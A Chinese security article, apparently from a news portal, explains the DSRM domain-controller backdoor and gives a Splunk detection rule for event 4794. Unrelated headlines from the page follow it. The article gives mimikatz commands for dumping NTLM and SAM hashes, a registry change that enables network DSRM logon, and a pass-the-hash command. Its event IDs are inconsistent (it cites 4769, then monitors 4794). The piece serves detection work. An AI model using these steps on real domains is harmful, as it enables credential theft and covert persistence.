01、简介
(资料图)
每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator”,基本很少会被重置,因此有着极强的隐蔽性。攻击者通过获取域控的DSRM密码,就可以使用帐户通过网络登录到域控服务器,从而达到权限维持的目的。
域内权限维持的方式有很多,每增加一条安全检测规则,就多一层安全保障。针对DSRM后门,基于AD Event日志能够帮助我们提供什么维度的检测,我们通过一个后门利用实例来看一下。
02、利用方式
(1)获取域内用户Hash
使用mimikatz查看域内用户test的NTLM Hash。
mimikatz # privilege::debugmimikatz # lsadump::lsa /patch /name:test
(2)将DSRM帐户和域用户的NTLM Hash同步
使用DSRM的密码和指定域用户test的密码进行同步,在命令行环境中使用ntdsutil工具重置DSRM管理员密码。
(3)抓取DSRM密码
因同步域内用户test的NTLM Hash,可以发现,DSRM Hash 和域用户test的NTLM Hash一致。
mimikatz#privilege::debugmimikatz # token::elevatemimikatz # lsadump::sam
(4)修改DSRM登录方式
DSRM 有三种登录方式,具体如下:
0:默认值,只有当域控制器重启并进入 DSRM 模式时,才可以使用 DSRM 管理员账号1:只有当本地 AD、DS 服务停止时,才可以使用 DSRM 管理员账号登录域控制器2:在任何情况下,都可以使用 DSRM 管理员账号登录域控制器
如果要使用 DSRM 账号通过网络登录域控制器,需要将该值设置为 2。
修改注册表:
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2
(5)使用DSRM远程登录
在域成员服务器上使用DSRM进行远程登录,注意domain使用域控的主机名。
mimikatz # privilege::debugmimikatz # sekurlsa::pth /user:administrator /domain:win-dc01 /ntlm:44f077e27f6fef69e7bd834c7242b040
03、攻击检测
当攻击者尝试重置DSRM管理员密码或是指定域内用户NTLM Hash同步时,都会生成4769事件,因此可以实时监控4794事件,一旦攻击者尝试修改DSRM密码就会触发告警。
4794事件:每次更改目录还原模式(DSRM)管理员密码时,就会生成此事件,包含SID和帐户名,以及调用方工作站。
安全规则:
index=ad EventCode=4794 | stats count earliest(_time) AS start_time latest(_time) AS end_time by dest user| eval start_time=strftime(start_time,"%Y-%m-%d %H:%M:%S")| eval end_time=strftime(end_time,"%Y-%m-%d %H:%M:%S") | eval message="在"+start_time+"到"+end_time+"时间内,域控服务器:"+dest +" 疑似DSRM域后门行为,试图设置目录服务还原模式管理员密码"+count+"次,操作账号:"+user| table start_time end_time user message
安全告警效果如下图:
X 关闭
-
长江经济带运输船舶去年岸电使用量创新高
据交通运输部长江航务管理局消息,随着长江大保护工作持续深入,2022年长江经济带11省(市)运输船舶靠港使用岸电共78万余艘次、871万余小时、
-
竹叶贷逾期十几天会影响征信吗|环球要闻
网贷逾期一般会上征信,有些借贷机构在用户逾期后一天后就会上报给征信机构,而有些借贷机构则是会在几天后上报给征信机构,因为有些借贷机构可
-
美国科技大厂裁员潮未完待续!亚马逊将裁逾1.8万人,传谷歌本月官宣裁员
新年假期刚过,美国一些科技大厂员工就不得不面对失业。当地时间4日,亚马逊宣布将裁员逾18000人,这一数字高于该公司最初计划,也将成迄今为
-
春运回家路,这些便利服务了解一下 今日看点
今年春运从1月7日开始,到2月15日结束,一共40天。今年春运期间的客流总量预计如何?随着“乙类乙管”措施落地,今年春运会呈现哪些新特点?
-
2023开年脑洞之一:视频号拿下李子柒?
李子柒为视频号转基因。马化腾沙场点将,明示微信视频号商业化必须提速。而抖音快手的先发优势,意味着视频号无法按部就
-
万安科技(002590.SZ):实控人减持期届满 已减持2.9888%股份-当前资讯
格隆汇1月5日丨万安科技公布,近日,公司收到公司实际控制人陈利祥出具的告知函,截止本公告披露日,陈利祥本次股份减持计划期限已届满,其已
-
【时快讯】2022年我国原油产量重回2亿吨 预计全年重点能源项目完成投资约2万亿元
【2022年我国原油产量重回2亿吨预计全年重点能源项目完成投资约2万亿元】记者从日前召开的2023年全国能源工作会议上获悉:2022年我国全力推动
-
石家庄公积金租房提取额度多少?
提取额度上限符合我市租住商品住房提取住房公积金条件的,职工及其配偶可申请提取住房公积金账户余额,每人每年提取一次,提取金额不超过12000
-
世界观察:1月5日基金净值:华夏中证500ETF最新净值3.2057,涨0.97%
1月5日,华夏中证500ETF最新单位净值为3 2057元,累计净值为0 7017元,较前一交易日上涨0 97%。历史数据显示该基金近1个月下跌3 17%,近3个月
-
入冬久咳不愈?用它冲水喝,排出浓痰,喉咙不干不痒,呼吸都顺畅_全球聚看点
入冬久咳不愈?用它冲水喝,排出浓痰,喉咙不干不痒,呼吸都顺畅